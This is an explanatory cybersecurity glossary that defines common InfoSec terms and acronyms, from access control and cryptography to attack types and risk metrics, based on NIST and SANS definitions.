In InfoSec there are numerous terms where not only it's important to know their meaning but their acronym as well. I can tell you that I have witnessed this already in my early career! From conversations involving troubleshooting an issue with fellow coworkers across different teams, trialing out a product and speaking with a support rep, reading documentation of a product or service, and listening to security podcasts, you should be comfortable with MOST of these common terms you're likely to come across. I created this glossary so that everyone can become comfortable with the definitions of most of these terms, and also conveniently assemble those definitions all into a single location. This glossary was created using both NIST's CSRC, and SANS glossaries as a guide. More terms will be added over time!
Access Control - Access Control ensures that resources are only granted to those users who are entitled to them.
Access Control List (ACL) - A mechanism that implements access control for a system resource by listing the identities of the system entities that are permitted to access the resource.
Access Control Service - A security service that provides protection of system resources against unauthorized access. The two basic mechanisms for implementing this service are ACLs and tickets.
Access Management - Access Management is the set of practices that enables only those permitted the ability to perform an action on a particular resource. The three most common Access Management services you encounter every day perhaps without realizing it are: Policy Administration, Authentication, and Authorization.
Access Management Access - Management is the maintenance of access information which consists of four tasks: account administration, maintenance, monitoring, and revocation.
Access Control Matrix - A table in which each row represents a subject, each column represents an object, and each entry is the set of access rights for that subject to that object.
Account Harvesting - Account Harvesting is the process of collecting all the legitimate account names on a system.
ACK Piggybacking - ACK piggybacking is the practice of sending an ACK inside another packet going to the same destination.
Automated Certificate Management Environment (ACME) - A protocol defined in IETF RFC 8555 that provides for the automated enrollment of certificates.
Advanced Persistent Threat (APT) - An adversary with sophisticated levels of expertise and significant resources, allowing it through the use of multiple different attack vectors (e.g., cyber, physical, and deception) to generate opportunities to achieve its objectives, which are typically to establish and extend footholds within the information technology infrastructure of organizations for purposes of continually exfiltrating information and/or to undermine or impede critical aspects of a mission, program, or organization, or place itself in a position to do so in the future; moreover, the advanced persistent threat pursues its objectives repeatedly over an extended period of time, adapting to a defender’s efforts to resist it, and with determination to maintain the level of interaction needed to execute its objectives.
Active Content - Program code embedded in the contents of a web page. When the page is accessed by a web browser, the embedded code is automatically downloaded and executed on the user's workstation. Ex. Java, ActiveX (MS)
Activity Monitors - Activity monitors aim to prevent virus infection by monitoring for malicious activity on a system, and blocking that activity when possible.
Address Resolution Protocol (ARP) - Address Resolution Protocol (ARP) is a protocol for mapping an Internet Protocol address to a physical machine address that is recognized in the local network. A table, usually called the ARP cache, is used to maintain a correlation between each MAC address and its corresponding IP address. ARP provides the protocol rules for making this correlation and providing address conversion in both directions.
Advanced Encryption Standard (AES) - A U.S. Government-approved cryptographic algorithm that can be used to protect electronic data. The AES algorithm is a symmetric block cipher that can encrypt (encipher) and decrypt (decipher) information.
Algorithm - A finite set of step-by-step instructions for a problem-solving or computation procedure, especially one that can be implemented by a computer.
Asymmetric Cryptography - Public-key cryptography; A modern branch of cryptography in which the algorithms employ a pair of keys (a public key and a private key) and use a different component of the pair for different steps of the algorithm.
Auditing - Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures.
Authentication - Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in an information system.
Authenticity - Authenticity is the validity and conformance of the original information.
Authorization - The process of granting user or process the permission to do or have access to something.
Autonomous System (AS) - One or more routers under a single administration operating the same routing policy.
Availability - Ensuring timely and reliable access to and use of information.
AAA - Authentication, Authorization and Auditing
Attack Surface Management (ASM) - Attack surface management is the continuous discovery, monitoring, evaluation, prioritization and remediation of attack vectors within an organization’s IT infrastructure. While similar in nature to asset discovery or asset management, often found in IT hygiene solutions, the critical difference in attack surface management is that it approaches threat detection and vulnerability management from the perspective of the attacker. In so doing, the organization is driven to identify and evaluate risk posed not just by known assets, but unknown and rogue components as well.
Attribute Authority (AA) - An entity, recognized by the Federal PKI Policy Authority or comparable Agency body as having the authority to verify the association of attributes to an identity.
Attribute Based Access Control (ABAC) - An access control approach in which access is mediated based on attributes associated with subjects (requesters) and the objects to be accessed. Each object and subject has a set of associated attributes, such as location, time of creation, access rights, etc. Access to an object is authorized or denied depending upon whether the required (e.g., policy-defined) correlation can be made between the attributes of that object and of the requesting subject.
Acceptible Risk - The level of Residual Risk that has been determined to be a reasonablelevel of potential loss/disruption for a specific IT system.
Access Authority - An entity responsible for monitoring and granting access privileges for other authorized entities.
Access Complexity - Reflects the complexity of the attack required to exploit the software feature misuse vulnerability.
Authentication Header (AH) - A deprecated IPsec security protocol that provides integrity protection (but not confidentiality) for packet headers and data.
Annual Loss Expectancy (ALE) - The yearly estimate of loss of an asset, calculated as: ALE = ARO × SLE.
Annualized rate of occurrence (ARO) - The probability that aloss will occur in a year’s time.
Backdoor - A backdoor is a tool installed after a compromise to give an attacker easier access to the compromised system around any security mechanisms that are in place.
Banner - A banner is the information that is displayed to a remote user trying to connect to a service. This may include version information, system information, or a warning about authorized use.
Banner Grabbing - The process of capturing banner information—such as application type and version— that is transmitted by a remote port when a connection is initiated.
Bastion Host - A special purpose computer on a network where the computer is specifically designed and configured to withstand attacks.
Business Email Compromise (BEC) - Business email compromise (BEC) is a type of email cyber crime scam in which an attacker targets a business to defraud the company. Business email compromise is a large and growing problem that targets organizations of all sizes across every industry around the world.
BIND - BIND stands for Berkeley Internet Name Domain and is an implementation of DNS. DNS is used for domain name to IP address resolution.
Biometrics - Measurable physical characteristics or personal behavioral traits used to identify, or verify the claimed identity of, an individual. Facial images, fingerprints, and handwriting samples are all examples of biometrics.
Block Cipher - An invertible symmetric-key cryptographic algorithm that operates on fixed-length blocks of input using a secret key and an unvarying transformation algorithm. The resulting output block is the same length as the input block.
Blue Team - The group responsible for defending an enterprise’s use of information systems by maintaining its security posture against a group of mock attackers (i.e., the Red Team). Typically the Blue Team and its supporters must defend against real or simulated attacks 1) over a significant period of time, 2) in a representative operational context (e.g., as part of an operational exercise), and 3) according to rules established and monitored with the help of a neutral group refereeing the simulation or exercise (i.e., the White Team).
Boot Record Infector - A boot record infector is a piece of malware that inserts malicious code into the boot sector of a disk.
Border Gateway Protocol (BGP) - An inter-autonomous system routing protocol. BGP is used to exchange routing information for the Internet and is the protocol used between Internet service providers (ISP).
Botnet - The word “botnet” is formed from the words “robot” and ”network.” Cyber criminals use special Trojan viruses to breach the security of several users’ computers, take control of each computer, and organize all the infected machines into a network of “bots” that the criminal can remotely manage.
Bridge - A product that connects a local area network (LAN) to another local area network that uses the same protocol (for example, Ethernet or token ring).
British Standard 7799 - A standard code of practice and provides guidance on how to secure an information system. It includes the management framework, objectives, and control requirements for information security management systems.
Broadcast - To simultaneously send the same message to multiple recipients. One host to all hosts on network.
Broadcast Address - An address used to broadcast a datagram to all hosts on a given network using UDP or ICMP protocol.
Brute Force - A cryptanalysis technique or other kind of attack method involving an exhaustive procedure that tries all possibilities, one-by-one.
Buffer Overflow - A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Adversaries exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.
Business Continuity Plan (BCP) - The documentation of a predetermined set of instructions or procedures that describe how an organization’s mission/business processes will be sustained during and after a significant disruption.
Business Impact Analysis (BIA) - An analysis of an information system’s requirements, functions, and interdependencies used to characterize system contingency requirements and priorities in the event of a significant disruption.
Certificate Authority (CA) - A trusted entity that issues and revokes public key certificates.
Cache Poisoning - Malicious or misleading data from a remote name server is saved [cached] by another name server. Typically used with DNS cache poisoning attacks.
Cyclic Redundancy Check (CRC) - A type of checksum algorithm that is not a cryptographic hash but is used to implement data integrity service where accidental changes to data are expected.
Challenge-Handshake Authentication Protocol (CHAP) - The Challenge-Handshake Authentication Protocol uses a challenge/response authentication mechanism where the response varies every challenge to prevent replay attacks.
Chain of Custody - A process that tracks the movement of evidence through its collection, safeguarding, and analysis lifecycle by documenting each person who handled the evidence, the date/time it was collected or transferred, and the purpose for the transfer.
Chain of Evidence - A process and record that shows who obtained the evidence; where and when the evidence was obtained; who secured the evidence; and who had control or possession of the evidence. The “sequencing” of the chain of evidence follows this order: collection and identification; analysis; storage; preservation; presentation in court; return to owner. Rationale: Sufficiently covered under chain of custody.
Chain of Trust CoT - A certain level of trust in supply chain interactions such that each participant in the consumer-provider relationship provides adequate protection for its component products, systems, and services.
Certificate Revocation List (CRL) - These are digitally signed “blacklists” of revoked certificates. Certification authorities (CAs) periodically issue certificate revocation lists (CRLs), and users can retrieve them on demand via repositories.
Certificate Status Authority (CSA) - A trusted entity that provides on-line verification to a relying party of a subject certificate's trustworthiness, and may also provide additional attribute information for the subject certificate.
Capability List - A list attached to a subject ID specifying what accesses are allowed to the subject.
Cipher Block Chaining (CBC) Mode - A cryptographic technique in which the same plaintext block if repeated, produces different ciphertext blocks. In this scheme, the input to the encryption algorithm is the XOR of the current plaintext block and the preceding ciphertext block; the same key is used for each block. In effect, we have chained together the processing of the sequence of plaintext blocks.
Cipher-based Message Authentication Code (CMAC) - A cryptographic mode of operation for calculating message authentication codes using a block cipher coupled with a secret key. You can use CMAC to verify both the authenticity and integrity of a message.
Common Name (CN) - An attribute type that is commonly found within a Subject Distinguished Name in an X.500 directory information tree. When identifying machines, it is composed of a fully qualified domain name or IP address.
Central Oversight Authority (COA) - The cryptographic key management system (CKMS) entity that provides overall CKMS data synchronization and system security oversight for an organization or set of organizations.
Cloud Access Security Broker (CASB) - An intermediary between users and cloud platforms that protects data in the cloud while addressing authorization and visibility concerns of corporations leveraging cloud services. CASBs address security gaps associated with third-party cloud services and platforms that are not under your control but that process and store your data.
Cloud Infrastructure Security Posture Assessment (CISPA) - The first generation of CSPMs. CISPAs focused mainly on reporting, while CSPMs include automation at levels varying from straightforward task execution to the sophisticated use of artificial intelligence.
Cloud Security Posture Management (CSPM) - Automates the identification and remediation of risks across cloud infrastructures, including Infrastructure as a Service (IaaS), Software as a Service (SaaS), and Platform as a Service (PaaS). CSPM is used for risk visualization and assessment, incident response, compliance monitoring, and DevOps integration, and can uniformly apply best practices for cloud security to hybrid, multi-cloud, and container environments.
Cloud Workload Protection Platforms (CWPPs) - CWPPs protect workloads of all types in any location, offering unified cloud workload protection across multiple providers. They are based on technologies such as vulnerability management, anti-malware, and application security that have been adapted to meet modern infrastructure needs.
Common Vulnerabilities and Exposures (CVE) - A nomenclature and dictionary of security-related software flaws.
Common Vulnerability Scoring System (CVSS) - A system for measuring the relative severity of software flaw vulnerabilities.
Credential Service Provider (CSP) - A trusted entity that issues or registers subscriber tokens and issues electronic credentials to subscribers. The CSP may encompass registration authorities (RAs) and verifiers that it operates. A CSP may be an independent third party, or may issue credentials for its own use.
Criticality - A measure of the degree to which an organization depends on the information or information system for the success of a mission or of a business function.
Criticality Analysis - An end-to-end functional decomposition performed by systems engineers to identify mission critical functions and components. Includes identification of system missions, decomposition into the functions to perform those missions, and traceability to the hardware, software, and firmware components that implement those functions. Criticality is assessed in terms of the impact of function or component failure on the ability of the component to complete the system missions(s).
Criticality Level - Refers to the (consequences of) incorrect behavior of a system. The more serious the expected direct and indirect effects of incorrect behavior, the higher the criticality level.
Cross-site Request Forgery (CSRF) - A web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other. For example, if a bank website is vulnerable to a CSRF attack, it may be possible for a subscriber to unintentionally authorize a large money transfer, merely by viewing a malicious link in a webmail message while a connection to the bank is open in another browser window.
Cross-site Scripting (XSS) - A web security vulnerability that allows attackers to inject malicious code into an otherwise benign website. These scripts acquire the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data transfers between the website and client. Websites are vulnerable if they display user-supplied data from requests or forms without sanitizing the data so that it is not executable.
Data Encryption Standard (DES) - A widely-used method of data encryption using a private (secret) key. There are 72,000,000,000,000,000 (72 quadrillion) or more possible encryption keys that can be used. For each given message, the key is chosen at random from among this enormous number of keys. Like other private key cryptographic methods, both the sender and the receiver must know and use the same private key.
Data Loss Prevention (DLP) - A systems ability to identify, monitor, and protect data in use (e.g. endpoint actions), data in motion (e.g. network actions), and data at rest (e.g. data storage) through deep packet content inspection, contextual security analysis of transaction (attributes of originator, data object, medium, timing, recipient/destination, etc.), within a centralized management framework. Data loss prevention capabilities are designed to detect and prevent the unauthorized use and transmission of NSS information.
Defense-in-Depth (DiD) - Information security strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and dimensions of the organization.
Demilitarized Zone (DMZ) - A perimeter network or screened subnet separating an internal network that is more trusted from an external network that is less trusted.
Denial of Service (DoS) - The prevention of authorized access to resources or the delaying of time-critical operations.
Deny by Default - To block all inbound and outbound traffic that has not been expressly permitted by firewall policy.
Digital Signature Algorithm (DSA) - An asymmetric cryptographic algorithm that produces a digital signature in the form of a pair of large numbers. The signature is computed using rules and parameters such that the identity of the signer and the integrity of the signed data can be verified.
Digital Signature Standard (DSS) - The US Government standard that specifies the Digital Signature Algorithm (DSA), which involves asymmetric cryptography.
Disaster Recovery Plan (DRP) - A written plan for processing critical applications in the event of a major hardware or software failure or destruction of facilities.
Discretionary Access Control (DAC) - An access control policy that is enforced over all subjects and objects in an information system where the policy specifies that a subject that has been granted access to information can do one or more of the following: (i) pass the information to other subjects or objects; (ii) grant its privileges to other subjects; (iii) change security attributes on subjects, objects, information systems, or system components; (iv) choose the security attributes to be associated with newly-created or revised objects; or (v) change the rules governing access control. Mandatory access controls restrict this capability.
Distributed Denial of Service (DDoS) - A denial of service technique that uses numerous hosts to perform the attack.
DomainKeys Identified Mail (DKIM) - An email security standard designed to make sure messages aren’t altered in transit between the sending and recipient servers. It uses public-key cryptography to sign email with a private key as it leaves a sending server. Recipient servers then use a public key published to a domain’s DNS to verify the source of the message, and that the body of the message hasn’t changed during transit. Once the signature is verified with the public key by the recipient server, the message passes DKIM and is considered authentic.
Domain-based Message Authentication Reporting and Conformance (DMARC) - An email authentication, policy, and reporting protocol. It builds on the widely deployed SPF and DKIM protocols, adding linkage to the author (“From:”) domain name, published policies for recipient handling of authentication failures, and reporting from receivers to senders, to improve and monitor protection of the domain from fraudulent email.
Extensible Authentication Protocol (EAP) - A framework that supports multiple, optional authentication mechanisms for PPP, including clear-text passwords, challenge-response, and arbitrary dialog sequences.
Fail Safe - A mode of termination of system functions that prevents damage to specified system resources and system entities (i.e., specified data, property, and life) when a failure occurs or is detected in the system (but the failure still might cause a security compromise).
Fast Flux - Protection method used by botnets consisting of a continuous and fast change of the DNS records for a domain name through different IP addresses.
Fail Secure - A mode of termination of system functions that prevents loss of secure state when a failure occurs or is detected in the system (but the failure still might cause damage to some system resource or system entity).
Fail Soft - Selective termination of affected, non-essential system functions when a failure occurs or is detected in the system.
Failover - The capability to switch over automatically (typically without human intervention or warning) to a redundant or standby information system upon the failure or abnormal termination of the previously active system.
Federated Identity - Require establishing trust with multiple parties by sharing user identity and attributes with multiple parties at multiple trust levels.
Fingerprinting - Sending strange packets to a system in order to gauge how it responds to determine the operating system.
Flooding - An attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Forward Proxy - Forward Proxies are designed to be the server through which all requests are made.
Fragment Overlap Attack - A TCP/IP Fragmentation Attack that is possible because IP allows packets to be broken down into fragments for more efficient transport across various media. The TCP packet (and its header) are carried in the IP packet. In this attack the second fragment contains incorrect offset. When packet is reconstructed, the port number will be overwritten.
Fully-Qualified Domain Name (FQDN) - A Fully-Qualified Domain Name is a server name with a hostname followed by the full domain name.
General Data Protection Regulation (GDPR) - A regulation in EU law on data protection and privacy for all individual citizens of the European Union and European Economic Area. Also addresses the export of personal data outside the EU and EEA areas.
Governance Risk and Compliance (GRC) - A set of processes and procedures to help organizations achieve business objectives, address uncertainty, and act with integrity. The basic purpose of GRC is to instill good business practices into everyday life.
Health Insurance Portability and Accountability Act (HIPAA) 1996 - Requires entities that process protected health information to comply with security and privacy requirements.
Highly Evasive Adaptive Threats (HEAT) - A class of cyberthreats that employs various techniques that are designed to bypass legacy detection stacks. Some techniques include dynamic file downloads, HTML smuggling, and obtaining password protected archived files to smuggle data past content filters, which the malicious content is downloaded to an endpoint without any user interaction. Other techniques include evading web categorization engines by compromising benign poorly protected websites, which are then used to serve malicious content.
Honey Pot - Programs that simulate one or more network services that you designate on your computer's ports. An attacker assumes you're running vulnerable services that can be used to break into the machine. A honey pot can be used to log access attempts to those ports including the attacker's keystrokes. This could give you advanced warning of a more concerted attack.
Host-Based Intrusion Detection System (H-IDS) - A program that monitors the characteristics of a single host and the events occurring within that host to identify suspicious activity.
Host-Based Intrusion Prevention System (H-IPS) - A program that monitors the characteristics of a single host and events occuring within that host to identify suspicious activity such as attacks and take action against them.
Hybrid Attack - A Hybrid Attack builds on the dictionary attack method by adding numerals and symbols to dictionary words.
Hybrid Encryption - An application of cryptography that combines two or more encryption algorithms, particularly a combination of symmetric and asymmetric encryption.
Identity-Aware Proxy (IAP) - A Google Cloud Platform service that centralizes user access to SaaS applications and other cloud resources accessed by HTTPS. IAP secures authentication for requests made to virtual machines running on GCP and other cloud-based and on-premises applications, only granting access to users you authorize. With IAP, users can connect from untrusted networks without using a VPN.
Identity as a Service (IDaaS) - A cloud-based authentication built and operated by a third-party provider. IDaaS companies supply cloud-based authentication or identity management to enterprises who subscribe.
Identity Provider (IdP) - A service that stores and manages digital identities. Companies use these services to allow their employees or users to connect with the resources they need. They provide a way to manage access, adding or removing privileges, while security remains tight.
Incident Handling - Incident Handling is an action plan for dealing with intrusions, cyber-theft, denial of service, fire, floods, and other security-related events. It is comprised of a six step process: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned.
Incident Response Plan - The documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of a malicious cyber attacks against an organization’s information systems(s).
Indicators of Attack (IOA) - Indicators of attack (IOA) focus on detecting the intent of what an attacker is trying to accomplish, regardless of the malware or exploit used in an attack.
Indicator of Compromise (IOC) - An Indicator of Compromise (IOC) is often described in the forensics world as evidence on a computer that indicates that the security of the network has been breached. Investigators usually gather this data after being informed of a suspicious incident, on a scheduled basis, or after the discovery of unusual call-outs from the network. Ideally, this information is gathered to create “smarter” tools that can detect and quarantine suspicious files in the future.
Information Security Management System (ISMS) - An Information Security Management System describes and demonstrates your organisation’s approach to information security and privacy. It will help you identify and address the threats and opportunities around your valuable information and any related assets. That protects your organisation from security breaches and shields it from disruption if and when they do happen.
Initial Access Brokers (IABs) - Initial access brokers are malicious actors that provide access to secure networks for a fee. They are often hackers but may also gain access to networks using social engineering. Their motivation is not to carry out cyberattacks themselves but rather to sell the access to another party.
Internet Control Message Protocol (ICMP) - An Internet Standard protocol that is used to report error conditions during IP datagram processing and to exchange other information concerning the state of the IP network.
Internet Message Access Protocol (IMAP) - A protocol that defines how a client should fetch mail from and return mail to a mail server. IMAP is intended as a replacement for or extension to the Post Office Protocol (POP).
Intrusion Detection System (IDS) - A security management system for computers and networks. An IDS gathers and analyzes information from various areas within a computer or a network to identify possible security breaches, which include both intrusions (attacks from outside the organization) and misuse (attacks from within the organization).
Intrusion Prevention System (IPS) - Software that has all the capabilities of an intrusion detection system and can also attempt to stop possible incidents.
IP Flood - A denial of service attack that sends a host more echo request ("ping") packets than the protocol implementation can handle.
Just-In-Time (JIT) provisioning - Enables automatic user account creation in an IdP the first time a user authenticates with a directory server delegated authentication or Desktop SSO.
Kerberos - A system developed at the Massachusetts Institute of Technology that depends on passwords and symmetric cryptography (DES) to implement ticket-based, peer entity authentication service and access control service distributed in a client-server network environment.
Key Distribution Center (KDC) - A way to automatically distribute keys to support arbitrary connections between pairs of users. The users can be a computer, a process or applications. Each user shares a unique key with the KDC, known as the master key.
Layer 2 Tunneling Protocol (L2TP) - An extension of the Point-to-Point Tunneling Protocol used by an Internet service provider to enable the operation of a virtual private network over the Internet.
Least Privilege - Least Privilege is the principle of allowing users or applications the least amount of permissions necessary to perform their intended function.
Lightweight Directory Access Protocol (LDAP) - A software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate Intranet.
Mandatory Access Control (MAC) - A means of restricting access to objects based on the sensitivity (as represented by a security label) of the information contained in the objects and the formal authorization (i.e., clearance, formal access approvals, and need-to-know) of subjects to access information of such sensitivity.
Man-In-The-Middle Attack (MitM - A form of active wiretapping attack in which the attacker intercepts and selectively modifies communicated data to masquerade as one or more of the entities involved in a communication association.
Message Authentication Code (MAC) - A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of the data.
Message Digest 5 (MD5) - A one way cryptographic hash function. Also see "hash functions" and "sha1".
Multi-factor Authentication (MFA) / Two-factor Authentication (2FA) - An authentication system that requires more than one distinct authentication factor for successful authentication. Multifactor authentication can be performed using a multifactor authenticator or by a combination of authenticators that provide different factors. The three authentication factors are something you know, something you have, and something you are.
Need-To-Know - Decision made by an authorized holder of official information that a prospective recipient requires access to specific official information to carry out official duties.
Network Address Translation (NAT) - The process of mapping addresses on one network to addresses on another network.
National Institute of Standards and Technology (NIST) - National Institute of Standards and Technology, a unit of the US Commerce Department. Formerly known as the National Bureau of Standards, NIST promotes and maintains measurement standards. It also has active programs for encouraging and assisting industry and science to develop and use these standards.
Network Interface Card (NIC) - A circuit board or card that is installed in a computer so that it can be connected to a network.
Network-Based IDS - A network-based IDS system monitors the traffic on its network segment as a data source. This is generally accomplished by placing the network interface card in promiscuous mode to capture all network traffic that crosses its network segment. Network traffic on other segments, and traffic on other means of communication (like phone lines) can't be monitored. Network-based IDS involves looking at the packets on the network as they pass by some sensor. The sensor can only see the packets that happen to be carried on the network segment it's attached to. Packets are considered to be of interest if they match a signature.Network-based intrusion detection passively monitors network activity for indications of attacks. Network monitoring offers several advantages over traditional host-based intrusion detection systems. Because many intrusions occur over networks at some point, and because networks are increasingly becoming the targets of attack, these techniques are an excellent method of detecting many attacks which may be missed by host-based intrusion detection mechanisms.
Non-Repudiation - Non-repudiation is the ability for a system to prove that a specific user and only that specific user sent a message and that it hasn't been modified.
One-Way Encryption - Irreversible transformation of plaintext to cipher text, such that the plaintext cannot be recovered from the cipher text by other than exhaustive procedures even if the cryptographic key is known.
One-Way Function - A (mathematical) function, f, which is easy to compute the output based on a given input. However given only the output value it is impossible (except for a brute force attack) to figure out what the input value is.
Open Shortest Path First (OSPF) - Open Shortest Path First is a link state routing algorithm used in interior gateway routing. Routers maintain a database of all routers in the autonomous system with links between the routers, link costs, and link states (up and down).
Open Authorization (OAuth) - Protocol standard that enables applications (consumers) to access protected resources from web services (service providers) via an API without requiring users to disclose their service provider credentials to those consumers.
Open Vulnerability and Assessment Language (OVAL) - A language for representing system configuration information, assessing machine state, and reporting assessment results.
Operating System (OS) Fingerprinting - Analyzing characteristics of packets sent by a target, such as packet headers or listening ports, to identify the operating system in use on the target.
Open Web Application Security Project (OWASP) - A nonprofit foundation that works to improve the security of software. Notable projects include the OWASP Top 10, a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
Password Authentication Protocol (PAP) - Password Authentication Protocol is a simple, weak authentication mechanism where a user enters the password and it is then sent across the network, usually in the clear.
Password Cracking - Password cracking is the process of attempting to guess passwords, given the password file information.
Password Sniffing - Passive wiretapping, usually on a local area network, to gain knowledge of passwords.
Payload - Payload is the actual application data a packet contains.
Payment Card Industry Data Security Standard (PCI DSS) - An information security standard administered by the Payment Card Industry Security Standards Council that is for organizations that handle branded credit cards from the major card schemes.
Personally Identifiable Information (PII) - Any information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual‘s identity, such as name, social security number, date and place of birth, mother‘s maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.
Ping of Death - An attack that sends an improperly large ICMP echo request packet (a "ping") with the intent of overflowing the input buffers of the destination machine and causing it to crash.
Ping Sweep - An attack that sends ICMP echo requests ("pings") to a range of IP addresses, with the goal of finding hosts that can be probed for vulnerabilities.
Pharming - This is a more sophisticated form of MITM attack. A user’s session is redirected to a masquerading website. This can be achieved by corrupting a DNS server on the Internet and pointing a URL to the masquerading website’s IP. Almost all users use a URL like www.worldbank.com instead of the real IP (192.86.99.140) of the website. Changing the pointers on a DNS server, the URL can be redirected to send traffic to the IP of the pseudo website. At the pseudo website, transactions can be mimicked and information like login credentials can be gathered. With this the attacker can access the real www.worldbank.com site and conduct transactions using the credentials of a valid user on that website.
Point-to-Point Tunneling Protocol (PPTP) - A protocol (set of communication rules) that allows corporations to extend their own corporate network through private "tunnels" over the public Internet.
Port Address Translation (PAT) - An extension of Network Address Translation (NAT) that permits multiple devices on a LAN to be mapped to a single public IP address to conserve IP addresses.
Pretty Good Privacy (PGP)TM - Trademark of Network Associates, Inc., referring to a computer program (and related protocols) that uses cryptography to provide data security for electronic mail and other applications on the Internet.
Protected Health Information (PHI) - Any information about health status, provision of health care, or payment for health care that is created or collected by a Covered Entity (or a Business Associate of a Covered Entity), and can be linked to a specific individual.
Provenance - Documenting the inputs, entities, systems, and processes that influence the data of interest, in effect providing a historical record of data and its origins
Proxy Server - A server that acts as an intermediary between a workstation user and the Internet so that the enterprise can ensure security, administrative control, and caching service. A proxy server is associated with or part of a gateway server that separates the enterprise network from the outside network and a firewall server that protects the enterprise network from outside intrusion.
Public Key Infrastructure (PKI) - The architecture, organization, techniques, practices, and procedures that collectively support the implementation and operation of a certificate-based public key cryptographic system. Framework established to issue, maintain, and revoke public key certificates.
Public-Key Forward Secrecy (PFS) - For a key agreement protocol based on asymmetric cryptography, the property that ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future.
Qualitative Assessment - Use of a set of methods, principles, or rules for assessing risk based on nonnumerical categories or levels.
Qualitative Risk Analysis - A method for risk analysis that is based on the assignment of a descriptor such as low, medium, or high.
Quantitative Assessment - Use of a set of methods, principles, or rules for assessing risks based on the use of numbers where the meanings and proportionality of values are maintained inside and outside the context of the assessment.
Quantitative Risk Analysis - A method for risk analysis where numerical values are assigned to both impact and likelihood based on statistical probabilities and monetarized valuation of loss or gain.
Ransomware - A type of malware that is a form of extortion. It works by encrypting a victim's hard drive denying them access to key files. The victim must then pay a ransom to decrypt the files and gain access to them again.
Ransomware as a service (RaaS) - A subscription-based model that enables affiliates to use already-developed ransomware tools to execute ransomware attacks. Affiliates earn a percentage of each successful ransom payment.
Reconnaissance - Reconnaissance is the phase of an attack where an attackers finds new systems, maps out networks, and probes for specific, exploitable vulnerabilities.
Reverse Proxy - Reverse proxies take public HTTP requests and pass them to back-end webservers to send the content to it, so the proxy can then send the content to the end-user.
Risk Assessment - The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system. Part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.
Risk Averse - Avoiding risk even if this leads to the loss of opportunity. For example, using a (more expensive) phone call vs. sending an e-mail in order to avoid risks associated with e-mail may be considered "Risk Averse".
Rivest-Shamir-Adleman (RSA) - An algorithm for asymmetric cryptography, invented in 1977 by Ron Rivest, Adi Shamir, and Leonard Adleman.
Role Based Access Control (RBAC) - Role based access control assigns users to roles based on their organizational functions and determines authorization based on those roles.
Rootkit - A collection of tools (programs) that a hacker uses to mask intrusion and obtain administrator-level access to a computer or computer network.
Routing Information Protocol (RIP) - Routing Information Protocol is a distance vector protocol used for interior gateway routing which uses hop count as the sole metric of a path's cost.
Remote Access Server (RAS) - Devices, such as virtual private network gateways and modem servers, that facilitate connections between networks.
Replay Attack - An attack in which the Attacker is able to replay previously captured messages (between a legitimate Claimant and a Verifier) to masquerade as that Claimant to the Verifier or vice versa.
Representational State Transfer (REST) - A software architectural style that defines a common method for defining APIs for Web services.
Residual Risk - Portion of risk remaining after security measures have been applied.
Risk Register - A central record of current risks, and related information, for a given scope or organization. Current risks are comprised of both accepted risks and risk that are have a planned mitigation path (i.e., risks to-be-eliminated as annotated in a POA&M). See OMB Circular A-11 for detailed information about risk register contents for Federal entities.
Secure/Multipurpose Internet Mail Extensions S/MIME - A widely accepted protocol for sending digitally signed and encrypted messages.
Security Assertion Markup Language (SAML) - An XML-based standard for exchanging authentication and authorization data between security domains — that is, between Identity Provider (a producer of assertions) and service providers (a consumer of assertions).
Security Incident and Event Management (SIEM) - A tool used on an organizational data networks to centralize the storage and interpretation of logs, or events, generated by other software running on the network.
S/Key - A security mechanism that uses a cryptographic hash function to generate a sequence of 64-bit, one-time passwords for remote user login. The client generates a one-time password by applying the MD4 cryptographic hash function multiple times to the user's secret key. For each successive authentication of the user, the number of hash applications is reduced by one.
Sender Policy Framework (SPF) - An email authentication protocol and part of email cybersecurity used to stop phishing attacks. It allows your company to specify who is allowed to send email on behalf of your domain. This is useful because in a typical phishing attack, the threat actor spoofs the sender address to look like an official business account or someone the victim may know.
Session Key - In the context of symmetric encryption, a key that is temporary or is used for a relatively short period of time. Usually, a session key is used for a defined period of communication between two computers, such as for the duration of a single connection or transaction set, or the key is used in an application that protects relatively large amounts of data and, therefore, needs to be re-keyed frequently.
Secure Hash Algorithm (SHA1) - A one way cryptographic hash function. It is slower than MD5 but more secure.
Security Information and Event Management (SIEM) - A security management tool that collects and stores event and log data, and correlates that data together to find threats. They are also used for compliance and reporting for companies which must adhere to compliance regulations like GDPR, PCI-DSS, and others.
Simple Access Object Protocol (SOAP) - An XML-based protocol for exchanging structured information in a decentralized, distributed environment.
Security Operations, Analytics and Reporting (SOAR) - Also known as Security Orchestration, and Automated Response, and Security Orchestration and Automation Platform (SOAP), is using automation to help reduce response times, improve consistency and amplify the productivity of incident response teams.
Simple Network Management Protocol (SNMP) - The protocol governing network management and the monitoring of network devices and their functions. A set of protocols for managing complex networks.
Single Loss Expectancy (SLE) - Tells us what kind of monetary loss we can expect if an asset is compromised because of a risk. Calculating SLE requires knowledge of the asset value (AV) and the range of loss that can be expected if a risk is exploited, which is known as the exposure factor (EF). EF is a percentage determined by how much of an impact we can expect based on the risk, the highest being 1 (signifying 100%). In formulaic terms, SLE = AV ∗ EF
